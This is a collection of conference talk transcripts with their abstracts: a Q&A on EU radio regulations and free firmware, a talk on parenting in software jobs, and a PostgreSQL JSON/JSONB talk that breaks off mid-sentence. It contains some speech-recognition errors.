Thank you. I've won myself anyway. Okay. You, regarding the regulations, you were stating about wireless devices, for example. You said that you're pursuing local governments to put in that exception for open source devices. But given that the Americans have somewhat similar legislation and device manufacturers will mostly work on a global basis, I think, do you think that they'll still make exceptions in at the device level to to run open hardware open firmware on there? Because if they have to limit it for the US and not for three countries in the EU or all but three countries in the EU, would they make a separate version for that? Do you think? Well, there's yes, there's also actually there's been a case already in US. I think it's in the beginning of August about that. It was yes, so it's about like TP link and there was exactly for the same requirement of software, software and hardware compliance. And so the so the court was saying that the alternative software should not be hampered by that, but they still find TP link to be liable, which is a little bit like, okay. So yeah, it's actually it's a good question. But I mean, the problem is that laws are different everywhere. And even despite the manufacturers acting globally, they're still acting in every different country according to the country laws. So okay, this might not be that in US, but it might be still might be in Europe. So laws are not universal. So I mean, and manufacturers have to abide by the national laws. So I would say that there is I mean, at least at some point there, there is hope to make it better. Also to you should care about that. Yes. Thank you. Thank you very much for your talk. Thanks. It's very concerning a little bit. What's happening there on you level. What I'm a little bit concerned about like stuff like routers or something like that are basically complete computers and machines. So they are basically the same as a desktop computer. And we have also radio interfaces, laptop notebook, whatever. So could those radio regulations also have an impact if all cases fail on laptops, for example? Yes. Free software on laptops also. So we're not just talking about network equipment here. Yeah. Yes, exactly. So this is also what our concerns because of it because of the wording of the directive is so vague that all the cases can fall in under that. And this is what makes it so concerning because before that we didn't have that requirement. And now suddenly we have that. And that's why it's really difficult to say whether it was that because you was unaware of what this can bring or it was something that some lobbying went too far at some point. Yes. So laptops, yes. Smartphones, yes. So we have to fall into that. Crazy. Crazy. Thank you. I'm not sure how much this really affects smartphones because the parts are really interacting with the radio stuff. At the moment they aren't free. When you are using Android or something similar, you have binary blobs for the Wi-Fi interface and other radio interfaces and you have a separate process or doing the cell phone stuff. So I don't think it affects smartphones so much. It's already bad. So I don't think that we will get worse because of this regulation. And then notebooks at least, there are Wi-Fi chipsets which are hard to make. So the Wi-Fi stuff is done in hardware more or less. So there's some kind of interface which is really fine. And I think laptops are more or less concerned by that. But routers are really a, and the Internet of Things are really a tough thing. And about the regulation. At the moment I think smartphones are usually registered in Great Britain. So they acknowledge the organization like FCC like in Britain. They register and say it's okay according to the regulation. So I don't know how the Brexit will change that probably. So perhaps there will be some other country where most of the equipment will be checked because it is fulfilled through regulation. So it might be useful to find out which countries that is and put effort to influence the regulations there. That's a good point. That's a really good point. I agree. I'm interested in the case of overseeing the development of the law. Is the Free Software Foundation the only organization that could prevent it when not overseeing it? Or are other non-governmental organizations around that also overlap that? Yes. Actually with R&D we were the first ones to publish anything on that. So as much as I talk to other civil societies they're like yeah we missed it. So it's really because of its highly technical nature and the fact that it's not a trendy topic of privacy and mass surveillance or something like that which is usually most of the digital rights organizations are focused on. And also other free software organizations or open source free software organizations they're also overlooked it and that's really unfortunate. It's like no one could even see that before a more, because in US there was more media attention to that and everything like this. And in our case in Europe it was just passed like that. So yeah we were the first ones. And it's already quite late. Exactly, exactly. That's the lesson we learned from this. I'm trying to save it last minute somehow. Okay I think that's it. Thank you again. Thanks. Next talk we'll be at 4.30 not in this room because next talk here is cancelled. We skip a slot. Have a good day everyone. Thanks. And just one last remark before we go. My colleague Max Mil will give a talk about RID and Compulse Re-Routers campaign in Germany and if you're interested in more details about that then yes go and see him at 16.30 in the first room. Thanks.
|
In the coming years, the EU is determined to bring its industries to the digital market and acquire a leading position on the global tech market. In order to achieve this ambitious goal of allowing Europe's "own Google or Facebook" to emerge, the EU has come up with several political and legislative proposals that obviously cannot overlook software. Three or more magic letters combined in an acronym have, therefore, the power to either support innovation and fair competition, or drown the EU in its vendor lock-in completely. The terms "open standards", "open platforms", and Free Software are being used more and more often but does it mean that the EU is "opening" up for software freedom for real? My talk will explain how several current EU digital policies interact with Free Software, and each other, and what does it mean to software freedom in Europe.
|
10.5446/32464 (DOI)
|
Welcome, everybody, for the after lunch presentation and session. So next we are going to have an inter-process communication talk. We'll learn about the FORX system call, as I read from the description. Just joking, we hear something about the parenting process, and I'm very glad we have Pérez here as a speaker, so please give him a warm round of applause. So if you were expecting some kind of multi-threading talk, whatever, you are in the wrong place. This is me, and I'm going to talk about parenting processes, because most of us have FORX these days. I'm Pérez, a software engineer since ever. I've been working in databases, analytics, platforms, science, and the very beginning of my career. I used to do the graph depth room at FOSDEM. Most of you know FOSDEM, it's kind of the big brother of this conference. If you don't know about it, you should go to Belgium, first weekend of February. It's been amazing. It's the best conference ever with respect to FOSDEM, that it's also very good. Obviously, I'm not just coding all the time, I like to enjoy my life with my kids, with my wife. TV movies, series. I used to do a lot of running before when I got more time. That's basically me. Before I start, I always do that kind of thing. I come from Spain, I come from Barcelona, and I've been told by many of my German friends, I'm the fastest speaker they ever met. As Leslie said, once to me, if I speak too fast, just to know if there's something like, slow down, slow down, and I will slow down. Second disclaimer is, we are going to enter a very sensitive topic. Everything that involves kids brings extremely strong opinions. For me, it's like religion, sports, you know. Everyone has an opinion and is very extremely vocal about it. This talk includes my personal experiences, opinions, ideas, and some numbers that might not match 100% of that reality. So welcome to the bias. We're going to be talking basically about what is software engineering today, and what are we doing at work every day. I'm going to provide a few numbers about what actually parenting and having child means. Some of them come out of a poll that I made a few weeks ago, so our contributions mostly from the community. Also sharing, one of the things that really warms me the most is about society expectations. Things that we do because others expect us to do it. We're talking about what startups and company culture means and do for us, and a few tips about what we can do and should do to avoid it. So starting about what software engineering or software in general means for us today, basically we find software everywhere. We find software from our refrigerator, we find software in our computers, in the internet, etc. So a lot of what we do has a strong impact on what other people are actually feeling and doing every day. And for all of us, software is a passion. I've been doing with computers since I was a small child dealing with a CPC, 128, with a cassette and all these things there. And while my brothers were playing football on the street. And most of you might think that this probably said, but for me it was super fun. So it's a passion and what we do as a job is our hobby. One thing that we also find in our industry is change. Things change extremely fast and change every day. So we are kind of required to be learning and constantly learning and improving ourselves every day. So what we just learned at the university 10 years after doesn't mean anything because, you know, when I was at the university, a child was starting. Now a child is here and we even have several flavors of it. Yeah, so we really need to keep up learning everything. There is also one idea that I strongly hate. It looks like that we have to be programming at work and we have to be programming after work because we should have a portfolio somehow because when we face a job advertising, they tell us, what do you do? Do you have a GIT profile? And I find this extremely complicated because especially for me as a human being, I don't just enjoy programming at, you know, eight hours a day. I used to go running, I like to spend time with my kids, I like to play games, etc. So this makes me sometimes the less appealing candidate for some jobs because I don't have an awesome portfolio. But this is how it works. More or less you have to live your programming life from work after work, etc. Yeah, another important stuff that happens in our jobs are our software engineers. This is the distinction between what we call us. We call us developers, we call us engineers. Do we think that our job is craft or is engineering job because this gives to really different company cultures to have. So I like to see that as the difference between alchemy and science. More stuff around what we do every day. Our job is highly rewarding, especially when we fix issues or it is to me at less. When we fix something and make something work, it's awesome. I mean, unless this feeling is something that I like a lot. Maybe this is going to touch some feelings around here, but our company culture used to be driving by ego. We are told that we are ninjas, hackers, whatever, that we are the best, that we are brilliant. We are good people, but when ego is so important in our kind of making us feel special everyone. This is how our jobs usually are. And also our kind of companies are always male centric. We have an extremely low amount of women. What is extremely sad because without diversity we don't have these different opinions. More facts. We love to be focused. If we are distracted, this is very bad. Related to this is the hero culture that I like to define and kind of say. I mean, I guess all of you pull all night to finish work during the university times. You have to meet a deadline and stay probably a long time at work that it wasn't necessary. When I see myself at the university, for example, when I was studying, I've never did this all night shift or kind of hero. It's pointless. If you plan your work properly, you kind of want it. But it's how we work. We work like we have to be long hours there. I don't know the rest of Germany, but I find it crazy in Berlin that this happens a lot. We have a lot of irregular working hours. I see a lot of my colleagues, not now, but when I first moved to Germany, starting work at 10, at 11, and staying at 8. It depends on the company, but especially in the start-ups or at least in Berlin, we have irregular working hours. And last kind of fact about what we do in our job or always our job is working around, etc. Is that we don't have... We are not able to generate enough interest on engineering because, you know, I don't... Exactly, I don't really know the numbers in Germany, and especially in Frescon, it's not the right place to say that because we have a lot of kids working around here. And it's amazing, but for example, the number of people willing to go to university in Barcelona and willing to engage in computer science is going down. And this is a fact that happens to all of us, and we have to think about it. Yeah. So these were kind of descriptions, kind of very fast descriptions of what we do at work and how we work. Before we move forward, I would like to think about one thing about what we do and why we do it. We define ourselves by what we do. If we ask our colleagues or we met a person for the first time, we kind of define each other, you know? You are a software engineer, you are a system administrator, both hate each other, I don't know why. Then we create DevOps or you are a fashion designer, you know? You are on IT, you are not technical, you are technical, etc. This is very important. And when we exclude or work on other things, yeah, we kind of lost this definition of ourselves. So after this kind of fast explanation of what we do at work and that work, it really defines ourselves. Kind of short stuff about companies. Our industry and companies are extremely diverse. But usually in all the companies, the culture is defined by the founders. I am very lucky to work at a company that the founders decided to build distributed from the very beginning. And this makes it, for example, I have colleagues working in Japan, I have colleagues working in the USA, and both work in the same team. But some other companies, because of fear, because of lack of trust, whatever, they want you to be in the same office. And even if it doesn't make sense for your work, they want you to stay there. There is a nice article from the BBS about the lack of trust on working remotely. And this really involves your daily life. It is important that if you are in a company and you do that way, it is important to set the right culture. Another thing that happened to me, or that I saw a lot of times in Berlin, or in Barcelona, even also, is when you build a startup and you have no money, you want to work a lot of hours, etc, etc. And this makes sense. So taking the right amount of people to do that, it is kind of stuff. It is important to know, many of you, for example, might know, but working more than giving a month of hours in Germany is illegal. So it is important to know your rights here. Something that also drives me crazy about startups is they are mission-driven. Every startup has a mission. And my question is, are we going to save the world with that mission? So every company has a job that is good money from customers and serves their customers. But all of this kind of helps this hype culture of ego when we want to get a company. And last on the list, we might have different understanding of what productivity means in a company. We actually have, because I'm lucky that I've worked on places that you basically got a task assigned and you were measured for your task and your job done. But I've been in other places that long working hours and you have to be there. And it's still important to know what kind of things you are in. Let's talk about perks, or what do we get at a company? I see some of you here that probably got the child at the university already. And some of you that may right after university. A lot of companies give in Berlin, Clomate, Pia, Akeeker, Ping Pong Table. I've seen very few companies being innovative on this idea, on how to attract people. But it's always provided or subsidized more or less. And at Lez in Berlin, in other areas like Vienna, where I used to do some work a few years ago, it's less common, but host meetups usually run after hours. So this means that you have to stay even longer. And few large companies might have a take care, but very few. Talking about the culture, as I said before, not everyone is used to remote working or working from home. Not quite sure about the rest of Germany for sure, but I know Barcelona and it's not like this. And looking for remote work actually is something that really lets you define your own piece and your own work. And as I said before, this article from the BBC, there is no such thing as flexible work. It's really, really interesting to read because it really tells you that we don't do more remote work because we are lacking trust. So it's really important when you create a company that is important facts. The environment in companies, as I said before, hiring. We used to use this Ninja hacker. I mean, maybe this is attracting some people, but I know this is changing because, for example, at my company, I work for these days, this is kind of improving. But in general, I still see a lot of ads that try to attract people with this ego driving idea. And last but not least, we might not be hiring the right people at certain ages. Because for some people, we ask weird questions. Weird? I mean, we don't hire women at a given age because they might get pregnant. We don't hire men after 45 years because they might forget all the history behind them, but they get the experience. So sometimes I see this in companies and it's very sad. Especially coming out of me, what I like to do, other things, not just living for my job, work-life balance is very important. So I ask myself a lot of times what companies can be do on that area. And most of them kind of ask me the same questions. How much work, how much balance? What does it mean for everyone? And I'm sure that if I ask someone here what work-life balance means, it means completely different for each one of us. For some of us, it might be that my company let me work on open source. For some of others, it might be that I want to do a sports. I'm setting up myself for the next triathlon. Or I want to run Berlin marathon. So I don't know about every company as I said at the beginning, but work-life balance in startups in Berlin or corporate companies in Barcelona sucks. Usually means that, for example, the typical average time that an engineer is working in Barcelona is from 9 to 7 with two hours break. From 9 to 7, it means that if you have one hour commute, you go back at home at 9 p.m. If you have childs, for example, this is no way something that scales. So just kind of a quick gossip thing. Most of my friends, when they go to childs, they start working freelance for international companies in Barcelona. And that's why, because the work-life balance is not so good. So after software companies, a little bit about what actually having childs means, and we do like regular basis. By the way, I have one and I wait another one for December. So I'm busy and I'm going to be extremely busy in December. As some of you who have childs or not, having a child is, it changes everything. There are no rules applied. And it's extremely different from one child to another one. I know the history that some parents tell me that they don't sleep for a long time. I'm very lucky because after two months, my kid was sleeping eight hours. But sleep is a very challenging thing. So if you have a not list, everyone likes the way they do it and they're extremely vocal about it. They tell you, you have to do these things that way, that other way, and you have your own ideas. And for sure, it's an ongoing process that you are changing every day and you don't know anything. So yeah, it's no time to complain for further. After a while, they grow up, you feed them, and they go to kindergarten. By the way, you have to find one before. I don't know the rest of Germany, but in Berlin, it's extremely challenging. And in Barcelona, it's extremely more challenging. So yeah, it's a big deal after that. And they get sick. So they get sick, you get sick, you have to maybe not go to work, and you have to get them to the doctors. So this means that you have to do a lot of things. And you actually have to devote yourself to be proficient in your work. You have to devote yourself to be good at home, etc. Something that really amazed me from Germany is this picture. I see so many dads in Berlin playing with their kids in the playground, in the cafes, etc. This is not imaginable in Barcelona, for example. It would be crazy that you do that. And that's amazing, because this means that you are more involved in your kids' education, you are more involved in what they do. This is less common in all places than in Germany. It's one thing that everyone has to think about themselves. What do we do? Do we involve more, less, etc. And as I said before, time management, when you get kids, it's kind of crazy. So you have less time, you have to be at work, and if you happen to have these timetables like we have in Barcelona from 9 to 7, it's like I'm a missing parent. One thing that a very good friend of mine told me in Berlin is what they do is they basically introduce the month of hours they work together and they share all the stuff that happens. So, yeah, it's a very important thing. And usually it's so happening that still women are taking all the care and all the load, that what means having a child. But yeah, important thing is time. I usually improve myself a lot about my time management skills after I got a kid because I have to. And in a natural, more or less, someone that's sitting down there kind of highlighted, we discussed once that you are as bad-patterned as everyone else is. And this is very important to understand from the very beginning. And empathy should never be forgotten when you are in all this because empathy for work, because they need you and your teams, and empathy in your work for you that you get a sick kid, etc. Yeah. And after kind of a few things about what parenting is, I'm going to enter the most scary thing in areas of this world, society expectations are. I guess this happens here in Germany like it happens in Barcelona. People expect you to do things one way. For example, we bought for our kid, we went to this IFASHER show in Berlin, and we bought this ear protection stuff. Now we are going on vacations to Barcelona, and we will get this protection stuff because we're going to see fireworks, and some kind of crazy dancing under the fireworks that we do in Barcelona in summer. I'm totally sure that my family will tell me and my friends will tell me, what the fuck are you doing? You're crazy? You don't do that. Here in Germany is the other way around. All people in the IFASHER, even the speaker in the IFASHER show in Berlin, were telling everyone, don't take your kid's ears because this is very loud. Usually we don't do a lot of things. Sorry. We have just a few, so it's easy to interact. It might be. But I find it very nice. What I was trying to explain with this was that society expects you to do stuff. In Barcelona, one kind of stuff and in Berlin, not completely different. For example, school schedules are in Barcelona. You're expecting to have your kid stay at lunch time because it's two hours, and if both of you have to work and you don't have family around, you have to do that things. This is not as cheap as in Germany, but you would expect to do it. Care tasks. I guess all of you found this crazy situation like here. I strongly find that when we do all this caring stuff, it's usually done by women. Even if in Germany or in Berlin, I see a lot of male parents taking these things or getting the kid to the doctor or getting the kid to the daycare and involving in this kind of... that you guys do in the daycare here in Germany. It's very important that everyone is involved in these ideas, especially... Another thing that drove me crazy is the differences when we access parental benefits here. Usually, at least my friend in Berlin takes two months out and women take 12 months because men still get a lot more money. At the end, society is forcing us to women to stay longer unemployed and out of this equation. Computers. This doesn't work now. I cannot be more strong on this sentence because it's not still well known. By the way, if you wonder about this, it's an ad from the Second Republic in Spain that was basically a fight between right-hand people and left-hand people. This says that the labor of a farmer is as important as the salary that the blue-collar worker gets. Here, I think most of us... you should know your rights and force it. You should also know your duties, your responsibilities. I've seen a couple of people doing motor shoots in Berlin, even if that's illegal. I've seen so many people doing elton tight because we can't just have women doing the whole elton tight and we can't go back to work. Awesome. I have to go faster. There is one awesome thing that I know from Berlin or from Germany, it's Kinderkrakengeld. You can get money when your kid is out because you can get out of work, too. I guess this also happens here in Berlin, but it happens a lot more in Barcelona. My congratulations to all these grandfathers, Geroz Elton, who are actually being fathers again because we have to work 12 hours a day. Strongly said, but it happens. In Spain, it happens a lot. Can we do things? Yes. We can encourage remote work. We can work from home policies that are easy and that are not bullshit for people to ask for it. We can have empathy because it's probably... one employee is asking to stay home because he has a seatkid. It's because he has a seatkid. It's not because he's lazy to come to the office. One very important thing is to think about time. When you schedule your meetings at 7pm, probably I will never be there because I have this going to bed to dance that everyone has to do with the kids. And using a schedule properly, recording, planning, and asynchronous communication helps a lot. I just have a little more time. Fear, but out. This is very important for me because one thing that can happen after you put all this pressure to people is that they burn out. So, they quit your company. They are not happy employees anymore. So you lost an important resource that took you money to train and to be useful. And after some tips, very fast for companies, for you as a parent, I strongly hate when people try to lecture me what I have to do as a parent. But the only kind of thing that I will say is talk to as many people as possible because you can get awesome ideas how to deal with your time challenges. And very quick, a few numbers from this poll that I run on the Internet. So, 91% male answers, 9% women, much as the industry. What else can I say? I would love to get more women, but yeah. By the way, before I forget, this is kind of thank you if Diana is looking to me over the Internet because thank you to Diana Gunther. Basically, she was the master of disaster spreading this poll over the Internet. And thank you to her, kind of, 350 people answered this stuff. Mostly centered around Germany with 56%. 11% from Spain and 7% from USA. This means like Germany is good. Spain is bad and USA is worse. So you get a bit of everything here. Questions about if you took parental leave for how long? The average between one month and six months. I can kind of say here that we kind of put a lot more options, but it basically matches my feeling that most of men takes between zero and two months of absence. If you took parental leave, also your parents took parental leave. I'm kind of worried about this 40% here. Because if most of this is main, this means that women never took any parental leave. Interesting. If your partner took parental leave for how long? This basically shows the 70% of women that everyone who answers this was a male. When going back to work, have you asked to work less hours? Yes, both. 70%. Awesome. It's very interesting when both can reduce hours because both are not excluded toward work. Yes, only me. 11%. Mostly, I guess. A few men and all the women. And no, 72%. Interesting number from this is if you get family nearby or not. I mean, I live in Berlin. My family is 108. 1800 kilometers away. So, you know, it gets challenging. But nearly 62% of people got family nearby somehow. Work environments being kids-friendly. And amazing, 65%. Should be even more. But it's good. I wonder if exactly this number is because most of my colleagues answer from elastic. Employees having remote or work-from-home policy. Nearly 74%. What is amazing? We all should have these kind of policies as we will see later. Access to daycare benefits. 80% of no. Why if it's so challenging? And one thing that I did is I put free text stuff that people can write whatever they want. And stuff that they wrote that is very well done. It's flexibility. Remote work and work-from-home easy. And kids welcome at work. So, if you have a company or have a boss or you are in a management position, doing stuff like this helps that your employees keeps happy and don't burn out and actually quit. What can be improved? A company or connected daycare? I always wonder why if we get people with child and this is a complicated thing, you don't even have to get a daycare like for example, the day in Berlin. You can call your daycare nearby and say, okay, can we make a deal with you? You have happy fathers and mothers who will come back to work and will be calm down because the kid is actually in a good daycare. It's actually the second one is very interesting. The human vein comes after the business revenue. Even if you are doing business, we are dealing with humans. So, when we forget that and especially in Spain, it's strongly forgotten. We are, I mean, we are not good. One that is very interesting to me at least and I got a lot of discussions with everyone is that sometimes kids are not so unhealthy to go to sleep and still moving around, but he is not good enough as a health nurse to go to daycare. Having a room, whatever, that you can actually, like here, here we got this elder and unkinned arbaica plants where they have the daycare things for the conference. And it's awesome. It can work. The kid can be happy. Some more pearls from tell me anything. Why moms need to change their schedule and not that? It's sad, but it happens. The full assumption seems to be full-time young male engineers. Why do we accept that women reduce time but male engineers not? Something that really amazed me is Quebec have a strong maternity plan close to the Gemma one. Even if it's North America, it's kind of super good. And last, I really want to share this because it is extremely important, is the management. My team and company were not as understanding. It was amazingly stressful and difficult. I often wonder if my, I often wonder if I would have been a better parent and my child would have had a stronger start if I worked for my current employee then. Humans realizing that is still me sad. So if you are actually in a position to change stuff, do it. Or if you can talk to your employee or management, whatever, do it. It's extremely important. Just quite quick numbers from the aesthetic agency. Usually in Germany you get 1.5 childs, even we get less in Barcelona. And just to wrap up and finish, we all have been kids who have been parents who have been stressed. I don't want to see more parents who are stressed by having kids because it's kind of a common responsibility. Because at the end of the day, who's going to pay our pensions? Our kids. Yeah. So it's very important. And I stopped talking. 39 minutes. What's kind of good? First of all, thank you very much for your presentation. I'm here to take questions. I don't have prices of my colleague. She got everything for a question. No questions? Even comments. I mean, it's time to see if this actually makes you sad or not. Because it makes me sad. And I want to change stuff. So that's why I actually wanted to do this presentation. Do you think it's destructive to have your kids close to your workplace? It is. And how do you deal with that? I have actually have another room for him to play at home. I'm working now. We have an office in Berlin, but I used to work from home a lot of times. Basically have a room for him and a room for me. But it makes sense that it's destructive. It's challenging. My whole story here is try to improve it because it is stressful. And you might actually lose talent in order to do that thing. Yeah. Anything else? No questions. Oh, you all were sleeping. It was just a time, so. So you're still around this afternoon at the probably at the Elasticz booth? I'm going to be around. If you see one title that actually screams a lot, it's mine. Okay, that's easy to figure out. So once again, thank you very much.
|
Becoming a parent is an step in many people’s life path that will arrive sooner or later, suddenly changing all your priorities. What before was critical might become less important, but what will not change is your need to work.
|
10.5446/32473 (DOI)
|
Okay. Good morning, everyone, and welcome to the first talk today here in Database Area. And welcome to Frostcom. My name is Stephanie Stöding. I'm working at Pax Life, and we are doing some crazy kinds of things because we, most of you might have servers in the cloud. We have servers above the clouds. Our servers are flying because we are doing inside entertainment. So, but we are doing it on own devices, which doesn't mean we have flying postcards. And that does mean we are flying elephants, which is totally crazy sometimes, but a lot of fun. So, that's about me and us. What's about today is Postgres and JSON. So, first of all, Postgres is JavaScript object notation, simple like that, invented for JavaScript, but now widely used for communications and interactions between applications and all these kind of things. We don't have to care about encoding. That's the complete different thing, for example, compared to XML or Varsing CSVs, because it's defined as Unicode, but most implementations use UTF-8. UTF-8 is a subset of Unicode, but well, good enough. Used for data exchange and web applications, but not only there. It's also used to exchange data between different APIs. It turned out to be also very practical in use there. Currently, we do have two standard. There is this one by Douglas Crockford, and then there is this ECMA. The one by Douglas Crockford is very funny, because it's only, when you print it, it's only five pages. That's the whole definition. And the other fun fact is it's really human readable. So, I've seen a lot of RFCs and specs, and when you ever took a look at the standards about SQL, it's always facing a lot of pain to read it, because it's not very well human readable and understandable, but that one is really clear in everything it does say about it, and that makes it easy. So, in Postgres, we are using the one that is implemented by Douglas Crockford. So, that's about that. JSON data types in Postgres are available since version 9.2. Welcome. Which is some years ago, so we have it for four years now. And then there was an extension, Bson. Bson is originally done by MongoDB, and there is an extension available on GitHub since 2013, which I played a lot with at the time being, because it was better than the JSON implementation that Postgres had itself. And on the other hand, it was completely the same implementation as it was in MongoDB. So, I played a lot with Meteor at the time being, and I also changed Meteor not to use MongoDB, because I wanted to have it completely as it. And I used this Bson data type in Postgres, was some hacking, but in the end it was running, but it was only for my personal fun. Never published that, because it was a lot of bugs inside, but just, would it be possible to do it? So, then it came out that JSON-B was invented. JSON-B is done in 9.4, and it's completely different to the ones that we had before. So, it's compressed JSON, which is one of the most important things. When it writes data away, you don't see any JSON that is saved on disk. It's fully transactional, that's mean you can everything, you can do with Postgres asset compliance, does also work here with JSON. And you can use it for up to one gigabyte per field. So, one record, one gigabyte per field, which is for JSON enough usually. So, now we go to the JSON functions that are available. So, this one is very funny because it simply really does what it's named to, row to JSON. So, you do a usual SQL statement, and you return the complete result, each row as JSON, just with one function. We will see that later on. So, then Postgres does have arrays, so which is very, very good that we are able to use arrays, and that makes life easier inside the database, because we can handle them inside and store them. But we can also export arrays as JSON, also with just one function, calling the function, and it does what it is named. JSONB to record set is the opposite of that one, because you can use JSONB to return SQL data, and work on it again, like you worked with other things and tables without any problems, if you have defined it properly. We have several operators, so an array element is just returned in that way, which is, okay. You can also, that is the position, by the way, and that is the array element by name, so you can also use it by name, if you know the name. We have objects inside JSON, you can also get the object, and you can get a value at a certain path, so just give me in an array this kind of value, which I just want to have. Well, there's the other thing that you should do with JSON to make it faster, because we can use indexes on JSONB. It does not work with JSON, so indexes are only available for JSON. Nowadays, this JSON type is only used if it's just for storing and not for accessing it mostly later on, because it's not that fast, and it's not compressed, so it does consume a lot of more resources than JSONB. In Postgres, we have this nice named GIN index, which is a geographical index, and the fun is that we can index a complete JSONB, because JSON is mostly paths, and then it does just work here, so we don't have to index values inside the JSON, as it's done, for example, by Mongo. We just create an overall index, and we can access everything through that index, which makes it much faster, and we don't have to care about certain detailed indexes. But you can even do these crazy things as to create unique indexes on JSON. I don't know if it does make sense, just as possible, so if you need it, you can do it. Now we come to new JSON functions. With 9.6, there's one new function that is a JSONB insert, that inserts a certain value into a JSONB path and returning the complete change JSON. 9.6 is currently in beta 3, so we'll be out later this year, probably around September, so just before the European Postgres Conference and Tallinn this year, I guess, and for the details, you can already see the documentation. Everything is in there with examples, and it's also a nice extension to the functions that we already do have. With 9.4, we got a lot more functions in JSONB, because we needed some that do help us, for example. JSONB pretty makes the JSON human readable, so it's not for computers, it's for us that we are able to pass the JSON with our eyes. Makes it easier when you code it. JSONB set is for update or add values inside JSON. Then we have new operators. The concatenate is you can just put together two JSONB fields and you get the result of this concatenation. And there is this delete, where you can delete a key, give it a key, and the key will be removed out of the JSONB. If somebody still is stuck with 9.4, there is an extension available at PGXN that does implement all these 9.5 versions into 9.4, so they are even usable in a little bit older version. So what I'm using later on is these data sources from Chinook Database that is available on the web. And I'm also will be using some Amazon book reviews. They are some years old, but they have been available on the web, so I use them to show some data examples with that. Speaking about the tables, that is a table in the Chinook Database that are available, so we are only using some of them, which will be these one where it is the artist, only has two columns. We use then an album, it's about music, you would have guessed, and we use tracks then. So to see what is possible with relational data to work with that on JSON. Coming about another question, does everybody know what a CTE is? If not, please raise your hand. Okay, so that's worth to talk about it. CTEs are in length commentable expressions, and I will use them very often in my example. It's also known as with queries because they start, you start a query with a with statement, and the example from Postgres is that you can do in recursive, with and with, and select all that data and have here an n plus one until it's less than 100. So you can select that afterwards, so you select here that T that you've defined up here, and then you get a result. So to make it clear, it's another form of subselect, but when you do that in the subselect, you wouldn't have fear inside with brackets and with everything, and these kind of things are much more human readable, and makes life really better to understand SQL statements that have some sort of subselect. So, let's see how it does work. So, what I'm doing here, here you see I start with a with, and here we are already with the commentable expressions. So, I give it a name that comes directly after the with, then it is the s, and then I define what I want to do, and then it is give me the album ID, the track ID, the name from the table track, and I want to have to have this data returned as JSON each row. So, I just give here this row to JSON, just the table names that I have defined up here, that's it. And the result you see we have JSON, and it was some sort of not that slow, 30 milliseconds, for these is not slow. The advantage is that you can use your current existing tables and mix them up with JSON or return them as JSON, and you can do it with inside the database, and you have it just available. So, the next one then would be that I extend the query, I make it a little bit smaller here. So, bema is not the best one. So, I'm going on with these tracks, and then that is the good thing that you can do with the commentable expressions, that is that you can change them. So, that does mean here I create these, define these tracks that we've already seen before, and here I define another one, JSON underlying tracks, and there it is, I select the row to JSON as it has been done in the statement before, and that is based on that one. So, and in the next one I'm going to select some album data, and I select them here inside from the album table, and go down, and I join them with the JSON. So, I can access every table that I've defined previously in the commentable expression, and that makes it very handy to work that way, and it's really better as to have it as subselects and brackets and all these kind of things. And what I'm doing here is I'm using the JSON data that we've already seen from the last, that's the last result still, and here I'm joining them together with the album, so that I can do it, I defined it here that I can access this album ID from that JSON that we have seen somewhere here, there's the album ID, there's a field inside the JSON, and as I've returned that result as an end, so that I can use it just in a join, and here I'm joining a table with JSON, group it by somewhat data, and in the end there comes then the result, here I'm selecting from what I've defined here as in albums, and I put an array egg on top of it, so that does mean when we have a look we create an array, we still have the artist ID in front, and here we have lots of data already defined as arrays, where we have not only the artist, we have also the albums, and not only one, we have all albums in one row. So what we can also do is instead of having that done by this way, we can, the way before, we can also use it to create a view, so that we can better handle the data that is inside this result. So I'm going again here until the albums, there is that join again that we've seen before, and here comes then the next commentable expression here, where I selecting what we've seen here, the complete array egg about the albums, groups and by the artist ID, now I connect that data with the artist itself, because we had that from there, I have the artist ID right there, so I can join them together very easy that way, and what I'm now doing, I'm returning the complete result as JSONB, instead of having an array with an artist ID that we've seen before, I create a view that returns the complete result as JSONB. So it created that view, let's see how it does look like. So here we see a complete data set for JSON data returned by this view that we've created previously, and it's still not that slow, because it has all artists that are in the database and with all albums and with all tracks, albums and tracks of one artist are encapsulated in one record or one field. So now let's see how it does really look like with this JSONB pretty, and make a little bit bigger so that you see that much better, and you see that JSONB pretty does really do a good job, because it really creates pretty JSON in the result with with line breaks, with indentation, so that it's really human readable. So if you create JSON and who are in the development process, use this JSONB pretty because it helps you to understand what data you do return. Without that, what we've seen before, everything in one row, you don't find anything. With that, you are able to find the structure, see the structure, identify the problems, and are able to access the data. So with the next one, we are getting some data from that view, and we are still using JSON methods, but what we are doing now when you have a look is, come on. Now I've converted JSON data from the view, and I reconvert that JSON data into relational data again by accessing the data fields inside the JSON. So what I'm doing here is I had first tables with structured data, SQL standard, and I switched that into JSON, and now I use that data to return it again as relational data. So it's JSON, it's a structural data, JSON structural data. It's still not that slow, running on my not that fast computer. So we can also return a little bit more. What we have here is I'm selecting again the data that we already had, and I return here every element. So that I can have the album title again as elements here and get the data out there. So how does it look like is so completely relational again. So here you access the data and it just returns all the data again, because we have here, we have arrays, we have to return them twice, so that we have the data outside the array, relationated again. So that is the same as we have seen it before with the relational data, where everything is in here with where album title. You see I get it by name, that's Metallica in this case. So just thumb it upon it. But we can do it also in a different way, because there is this function JSONB2recordZ that returns the data selected here and returns it with the definition that we give here in the S part. Here you see a sub-select, because that is inside the JSONB recordZ function, where you give the query that you want to select from. So here we see I get only the data for the artist ID with the ID 50 and what we see here is we still have here the tracks, which is still JSONB, but returns the rest of it again as relational data. So that we are able to access this right away. Any questions so far? Cool. So making it smaller again so that we can see it. So here I'm selecting some data again from this JSONB recordZ and to get that data displayed that way. So these are then the album ID, a track ID, is a track name, media type, whatever it is, and that is milliseconds, how long it is and it does have for whatever reason a unit price. It's just there, so I have to mention it when I return the data, I have to mention all the fields here that are inside that JSONB field to return them. Otherwise you might run into a problem, so you have to know what's inside that JSON. What I'm doing now is some sort of crazy thing. I'm creating a function for a trigger because my computer is very low here, so that's a little bit crazy because what I'm going to do show now is that I can even update the data in the view that we recently created. So we remember that we had this view where we created JSON from relational data and that was a very complex view because it's not straight, just connecting some tables. But in Postgres you are able to make that view writable. What you have to do is you have to write your own function for that and Postgres supports for this trigger function, so I only update then the artist here. So what I'm going through is getting the JSON data comparing if there was any change. If there was a change then I run an update on the original table and I keep it here as that because that would go much deeper with updating the albums and the tracks itself is also possible for this. You have to use absurd, which is new since 9.5, where you can insert or update data with one statement in Postgres. And it's just that is only some error handling so if something goes wrong that we can display an error. So that trigger was created but it's not attached as triggers are only created as triggers with all the connection to the database which is at sometimes very useful because I can reuse my triggers. So what I'm doing 